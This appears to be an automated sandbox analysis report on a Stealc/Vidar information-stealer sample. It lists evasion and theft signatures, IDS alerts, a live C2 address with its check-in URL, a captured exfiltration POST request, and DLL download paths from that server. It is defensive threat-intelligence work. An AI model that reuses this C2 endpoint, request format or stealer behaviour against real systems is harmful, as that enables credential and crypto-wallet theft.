Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519332
MD5:	7f275c6abf9ee064febb9736bfb047f2
SHA1:	5c93982f849358223f1472caf1ed8f2061a66616
SHA256:	747c903a9c783a32613d454bc73e8911525fe3b3f0c72b138458ab7f9fbe1cb1
Tags:	exeStealcuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 1272 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7F275C6ABF9EE064FEBB9736BFB047F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1526931154.0000000004D60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 1272	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 1272	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 1272	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 1272	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.3a0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:24.761223+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.9	49705	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:24.754629+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.9	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:24.978688+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.9	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:25.978634+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.9	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:24.985606+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.9	49705	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:24.532355+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.9	49705	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T11:33:26.456036+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:32.431922+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:33.453502+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:34.146917+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:34.673950+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:36.318591+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:36.821628+0200	2803304	3	Unknown Traffic	192.168.2.9	49705	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 41 30 43 35 35 34 38 31 34 42 33 38 33 37 37 33 34 39 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"A1A0C554814B3837734947------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"save------KJKEHIIJJECFHJKECFHD--

Source: file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37.u
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllT
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllept
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll$
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll6
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllZ
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dlll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll2
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllH
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllz
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll~
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllm
Source: file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/1b
Source: file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/Ebi)
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%_
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php24
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;P
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB_9)
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpOP
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX#
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpainnet
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpirefox
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpkP
Source: file.exe, 00000000.00000002.1753853572.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnfigOverlay
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phprowser
Source: file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phptrf_
Source: file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1777766823.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1766517240.000000001D4B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://support.mozilla.org
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: file.exe, 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: file.exe, 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1701427357.000000002F60E000.00000004.00000020.00020000.00000000.sdmp, BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
